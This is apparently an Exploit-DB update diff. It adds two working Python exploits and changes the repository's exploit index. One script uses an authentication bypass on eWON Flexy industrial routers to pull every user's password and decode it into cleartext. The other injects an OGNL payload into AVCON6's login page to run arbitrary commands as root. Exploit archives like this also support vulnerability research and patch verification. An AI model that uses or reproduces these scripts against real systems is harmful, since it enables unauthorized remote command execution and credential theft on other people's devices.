DB: 2019-09-12

2 changes to exploits/shellcodes

Enigma NMS 65.0.0 - Cross-Site Request Forgery
Enigma NMS 65.0.0 - OS Command Injection
Enigma NMS 65.0.0 - SQL Injection
Enigma NMS 65.0.0 - Cross-Site Request Forgery
Enigma NMS 65.0.0 - OS Command Injection
Enigma NMS 65.0.0 - SQL Injection
AVCON6 systems management platform - OGNL Remote Command Execution
eWON Flexy - Authentication Bypass

exploits/hardware/webapps/47380.py

@@ -0,0 +1,89 @@
+#! /usr/bin/env python
+''' 
+    # Exploit Title: eWON v13.0 Authentication Bypass
+    # Date: 2018-10-12
+    # Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be
+    # Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0
+    #                  [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability
+    # Vendor Homepage: https://www.ewon.biz
+    # Version: eWon Firmware 12.2 to 13.0
+    # Tested on: eWon Flexy with Firmware 13.0s0
+    
+	Copyright 2019 Photubias(c)
+
+        This program is free software: you can redistribute it and/or modify
+        it under the terms of the GNU General Public License as published by
+        the Free Software Foundation, either version 3 of the License, or
+        (at your option) any later version.
+
+        This program is distributed in the hope that it will be useful,
+        but WITHOUT ANY WARRANTY; without even the implied warranty of
+        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+        GNU General Public License for more details.
+
+        You should have received a copy of the GNU General Public License
+        along with this program.  If not, see <http://www.gnu.org/licenses/>.
+        
+        File name eWON-Flewy-Pwn.py
+        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
+
+        This script will perform retrieval of clear text credentials for an eWON Flexy router
+         Tested on the eWON Flexy 201 with Firmware 13.0s0
+         Only requires a valid username (default = adm) and 
+         this user must have the Rights 'View IO' & 'Change Configuration'
+         
+        It combines two vulnerabilities: authentication bypass (fixed in 13.1s0)
+          and a weak password encryption, allowing cleartext password retrievel for all users (fixed in 13.3s0)       
+'''
+username = 'adm'
+
+import urllib2,urllib,base64,binascii,os
+
+def decode(encpass):
+    xorString = "6414FE6F4C964746900208FC9B3904963A2F61"
+    def convertPass(password):
+        if (len(password)/2) > 19:
+            print('Error, password can not exceed 19 characters')
+            exit()
+        return hexxor(password, xorString[:len(password)])
+    def hexxor(a, b):
+        return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)])
+    if encpass.startswith('#_'):
+        encpass = encpass.split('_')[2]
+    coded = base64.b64decode(encpass)
+    codedhex = binascii.hexlify(coded)[:-4]
+    clearpass = binascii.unhexlify(convertPass(codedhex))
+    print('Decoded password: ' + clearpass)
+
+def getUserData(userid, strIP):
+    postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]'
+    postwsdlist = postwsdlist.replace('|1','|'+str(userid))
+    postdata = {'wsdList' : postwsdlist}
+    b64auth = base64.b64encode(username+':').replace('=','')
+    result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read()
+    resultarr = result.split('","')
+    if len(resultarr) == 20:
+        fname = str(resultarr[1])
+        lname = str(resultarr[2])
+        usern = str(resultarr[3])
+        if len(usern) == 0:
+            return True
+        encpassword = resultarr[4]
+        print('Decoding pass for user: '+usern+' ('+fname+' '+lname+') ')
+        decode(encpassword)
+        print('---')
+        return True
+    else:
+        return True
+
+strIP = raw_input('Please enter an IP [10.0.0.53]: ')
+if strIP == '': strIP = '10.0.0.53'
+print('---')
+
+for i in range(20):
+    if not getUserData(i, strIP):
+        print('### That\'s all folks ;-) ###')
+        raw_input()
+        exit(0)
+        
+raw_input('All Done')

exploits/java/webapps/47379.py

@@ -0,0 +1,59 @@
+# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution
+# Date: 10/09/2018
+# Exploit Author: Nassim Asrir
+# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
+# CVE: N\A
+# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)
+# Thanks to: Otmane Aarab
+# Example below:
+# python ./rce.py http://server:8080/ id 
+# Testing Target: http://server:8080/
+# uid=0(root) gid=0(root)
+# Vendor: http://www.epross.com/
+# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing 	
+# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time.
+# I am not responsible for any wrong use.
+######################################################################################################
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+import urllib2
+import httplib
+
+
+def exploit(url, cmd):
+    payload =  'login.action?redirect:'
+    payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).'
+    payload += 'start(),%23b%3d%23a.getInputStream(),'
+    payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),'
+    payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d'
+    payload += '.read(%23e),%23matt%3d%23context.'
+    payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),'
+    payload += '%23matt.getWriter().println(%23e),%23matt.'
+    payload += 'getWriter().flush(),%23matt.getWriter()'
+    payload +=  '.close()}'
+
+  
+    try:
+        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}
+        request = urllib2.Request(url+payload, headers=headers)
+        page = urllib2.urlopen(request).read()
+    except httplib.IncompleteRead, e:
+        page = e.partial
+
+    print(page)
+    return page
+
+
+if __name__ == '__main__':
+    import sys
+    if len(sys.argv) != 3:
+        print("[*] struts2_S2-045.py http://target/ id")
+    else:
+        print('[*] Avcon6-Preauh-Remote Command Execution')
+        url = sys.argv[1]
+        cmd = sys.argv[2]
+        print("[*] Executed Command: %s\n" % cmd)
+	print("[*] Target: %s\n" % url)
+        exploit(url, cmd)

files_exploits.csv

@@ -41714,9 +41714,9 @@ id,file,description,date,author,type,platform,port
 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
 47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php,
 47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80
-47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple,
+47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,xerubus,webapps,multiple,
-47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple,
+47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,xerubus,webapps,multiple,
-47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple,80
+47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,xerubus,webapps,multiple,80
 47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80
 47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi,
 47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php,80
@@ -41724,3 +41724,5 @@ id,file,description,date,author,type,platform,port
 47371,exploits/php/webapps/47371.txt,"WordPress Plugin Photo Gallery 1.5.34 - SQL Injection",2019-09-10,MTK,webapps,php,80
 47372,exploits/php/webapps/47372.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting",2019-09-10,MTK,webapps,php,80
 47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80
+47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java,
+47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware,